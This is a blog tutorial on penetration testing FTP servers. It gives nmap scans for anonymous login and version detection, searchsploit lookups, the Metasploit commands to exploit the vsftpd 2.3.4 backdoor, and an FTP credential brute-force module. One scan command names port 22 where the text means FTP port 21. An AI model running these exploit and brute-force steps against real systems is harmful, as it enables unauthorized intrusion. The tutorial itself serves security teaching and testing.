Mon. Aug 26th, 2019

HackIsOn

Learn Different

Penetration testing FTP service

3 min read

Hello everyone in this post we are going to discuss about how to do pentesting on ftp service running on port 21. Sometimes while testing the target for vulnerability, port 21 ( FTP ) might be open, at that time you can use the following method to do further investigation on that port to conclude whether the target is vulnerable or not.

What is FTP?

File transfer protocol ( FTP ) is used to transfer files from one host to another on a computer network. And  also used for downloading the files from servers to computers.

Scanning target for anonymous ftp login :

Anonymous ftp login allows anyone to login to the ftp server as a anonymous user, you can use the following technique to check whether anonymous login is enabled or not.

Open up your terminal and type the following command

nmap -A -p 22 {IP}

scanning ftp with nmap

NOTE : If the target allows anonymous login then do this step otherwise move to the next step.

By the nmap scan we can see that anonymous login is enabled on the target so using the following technique trying to login to the ftp server.

ftp { IP }

Type the username as anonymous

you can type anything in the password field and just hit enter

Anonymous ftp login

Successfully logged in.

FTP version Detection:

In order to exploit the target we need the service version to search publicly available exploit. So we need to detect the ftp version of the target. To do that use the following nmap command

nmap -sV -p 21 { IP }

finding version with nmap

In the above method we used nmap and There is an alternative method available to detect the ftp version (i.e ) via metasploit framework. By default metasploit has a auxiliary module to scan ftp version. To use that open msfconsole and type the following commands.

use auxiliary/scanner/ftp/ftp_version

set rhosts { IP }

run

searching module
finding version

Exploiting Possible vulnerabilities:

After scanning the target for version, try to gather all publicly exploits available from websites like exploit-db, cx security etc., for that ftp version and then try to exploit it. Here in our case the target runs Vsftpd 2.3.4, First lets search exploit using searchsploit tool

searchsploit is a tool available by default in Kali Linux, that helps you to make a copy of all available exploits from exploit db. These exploits are available locally in your kali linux machine in the following location. /usr/share/exploitdb

Now to use the tool by just typing the following command in your terminal

searchsploit { service name + version }

As per the searchsploit result, we can conclude that the target is vulnerable to remote code execution. So to exploit the target with metasploit, use the following commands.

use exploit/unix/ftp/vsftpd_234_backdoor

set rhosts { IP }

run

exploiting ftp

Conclusion:

We have successfully exploited the target using the public exploit. And there is another way to login to ftp, via bruteforcing we can login to the target this technique is a bit older one, but while doing internal pentesting this will help you a lot because most of the server admins might use default login details. So while doing internal penetration testing try this method. For doing this there is a auxiliary module available in metasploit, You can use that for doing bruteforcing. The following are the commands to do that.

use auxiliary/scanner/ftp/ftp_login

set USERPASS_FILE /root/Desktop/userpass.txt

set rhosts { IP }

run

We have successfully brute-forced and found ftp username and password. Like this way you need to do pentesting on ftp port. As a conclusion we exploited the target with the above methods like this way you should do pentesting.

More tutorials are on the way. Hope you like this post please Do share it with your friends and don’t forget to subscribe to our blog and Channel

More Stories

Leave a Reply

Your email address will not be published. Required fields are marked *

Skip to toolbar